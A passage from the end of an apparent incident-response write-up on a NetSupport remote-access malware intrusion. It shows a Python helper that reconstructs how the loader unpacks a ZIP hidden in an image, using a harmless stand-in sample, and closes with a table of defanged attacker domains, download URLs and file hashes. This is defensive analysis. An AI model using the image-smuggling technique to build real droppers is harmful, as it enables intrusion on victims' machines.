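def extract_entries(zip_bytes: bytes) -> dict:
    """Entry name -> content, as the loader's ZipArchive loop would write them out."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as za:
        return {e.filename: za.read(e.filename) for e in za.infolist()}


def build_sample() -> bytes:
    """Constructed stand-in for nh2.jpg: a fake JPEG header plus a tiny two-file ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as za:
        za.writestr("NetHealth.exe", b"MZ-not-really-an-executable")
        za.writestr("client32.ini", b"[Client]\nGatewayAddress=example\n")
    prefix = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(range(256)) * 3
    return encode_payload(prefix, buf.getvalue(), chunk=7, rot=-5)


if __name__ == "__main__":
    print(sorted(extract_entries(decode_payload(build_sample()))))
```

Because the key is cut from the image bytes that precede the marker, a fresh image from the server means a fresh key; the analyst therefore needs the exact nh2.jpg that the victim received, not just the ZIP, to reproduce the decode.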

Conclusions

The actions described above were completed by the Threat Actor in a session that lasted two minutes and forty-seven seconds. Fortunately, the internal security team caught the activity and isolated the hosts, preventing a wider infection. Even when a security breach appears brief or limited in scope, it must be thoroughly investigated: the potential consequences of disregarding the risk range from financial loss to reputational damage.

User awareness training is a fundamental part of any organisation’s security posture and strategy and must be given the attention it deserves. Continuous education and strong incident response processes are essential to safeguarding business operations.

IOCs

| Value | Type | Comment |
|---|---|---|
| resutato[.]com | Domain | Command & Control |
| hxxps://resutato[.]com/2-4.txt | URL | Malware download (clipboard-staged PowerShell command) |
| hxxps://resutato[.]com/b2/tap.php | URL | Malware download (PowerShell loader script) |
| hxxps://resutato[.]com/b2/res/nh2.jpg | URL | Malware download (image carrying the NetSupport archive) |
| hxxps://resutato[.]com/b2/srs/ | URL | Malware download (fallback, individual NetSupport files) |
| hxxps://resutato[.]com/b2/st/st.php | URL | Command & Control + Malware download |
| hxxp://196.251.69[.]195:8085/update.zip | URL | Malware download (update.zip containing update.msi) |
| 196.251.69[.]195 | IP address | Malware download |
| nimbusvaults[.]com | Domain | Command & Control (libcurl.dll) + Malware download |
| hxxps://nimbusvaults[.]com/update/Z4Vw.zip | URL | Malware download (GenUp.exe and libcurl.dll) |
| 4e57ae0cc388baffa98dd755ac77ee3ca70f2eaa | SHA1 | libcurl.dll |
| df3125365d72abf965368248295a53da1cdceabe | SHA1 | Update.msi |